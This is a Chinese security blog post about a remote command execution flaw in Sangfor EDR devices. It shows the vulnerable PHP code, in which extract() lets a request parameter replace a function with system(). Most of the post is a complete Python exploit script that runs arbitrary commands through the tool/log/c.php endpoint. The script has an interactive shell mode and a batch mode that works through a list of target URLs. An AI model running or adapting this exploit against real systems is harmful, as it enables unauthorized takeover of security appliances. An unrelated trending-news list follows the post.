深信服edr设备远程命令执行漏洞
安全
2021-03-07 16:21
声明:该文章由作者(孔秀)发表,转载此文章须经作者同意并请附上出处(0XUCN)及本页链接。。
RCE
echo "<p><b>Log Helper</b></p>"; $show_form($_REQUEST);
跟入show_form
/** * 显示表单 * @param array $params 请求参数 * @return */ $show_form = function($params) use(&$strip_slashes, &$show_input) { extract($params); $host = isset($host) ? $strip_slashes($host) : "127.0.0.1";
exp:
# -*- coding: utf-8 -*- # @Time : 2020/8/17 # @Author : Angel # @File : edr.py # 感谢大佬提供Command execute部分代码 import requests import re import urllib3 import sys urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def hello(): print ("SangFor EDR remote command code exploit") print ("") print ("Angel 20200817") print ("") print ("Github: https://github.com/A2gel/sangfor-edr-exploit") print ("") print ("Command: python edr.py url http://10.10.10.0/") print ("Command: python edr.py file 1.txt whoami") def readFile(filename): list=[] keywords = open('./'+filename, 'r') line = keywords.readline().strip('\n') while (line): list.append(line) line = keywords.readline().strip('\n') keywords.close() return list def log(name,value): save = file(str(name)+".txt", "a+") save.write(str(value)+"\n") save.close() def rce(host,command): headers={ 'Connection': 'close', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Sec-Fetch-Site': 'none', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'document', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9' } url="{}/tool/log/c.php?strip_slashes=system&host={}".format(host,command) print url try: response = requests.get(url,verify=False,headers=headers,timeout=3) response.raise_for_status() response.encoding = "utf-8" #print response.text res=re.findall(r'<b>Log Helper</b></p>(.+?)<pre><form',response.text,re.S) response.close() print(res[0]) return "+" except: print('failed') return "-" if __name__ == '__main__': if len(sys.argv) < 2: hello() else: if sys.argv[1] == "url": while 1: command = raw_input("Command> ") if command: print ("Try %s"%sys.argv[2]) rce(sys.argv[2],command) else: print ("Please input Command") command = "" elif sys.argv[1] == "file": if (sys.argv) < 3: print "Command: python edr.py file url.txt" else: for i in readFile(sys.argv[2]): print ("Try %s"%i) if rce(i,sys.argv[3]) == "+": log("success",sys.argv[3]) else: log("error",sys.argv[3]) else: hello()
参考链接:
https://www.cnblogs.com/potatsoSec/p/13520546.html
[超站]友情链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
排名
热点
搜索指数
- 1 牢记嘱托 感恩奋进 4989522
- 2 黎真主党称爆炸事件可视为以色列宣战 4909865
- 3 微信朋友圈可以发实况图了 4839407
- 4 南航首架C919飞机成功首航 4732489
- 5 小英被曝塌房后两天掉粉近10万 4685103
- 6 “普拉桑”二登上海 4549790
- 7 初代网红张大奕宣布关闭十年网店 4429906
- 8 女生称取快递被男生多次贴身猥亵 4374884
- 9 公安机关重拳打击网络谣言 4212458
- 10 云南一高校后勤回应3硕士被聘为宿管 4170655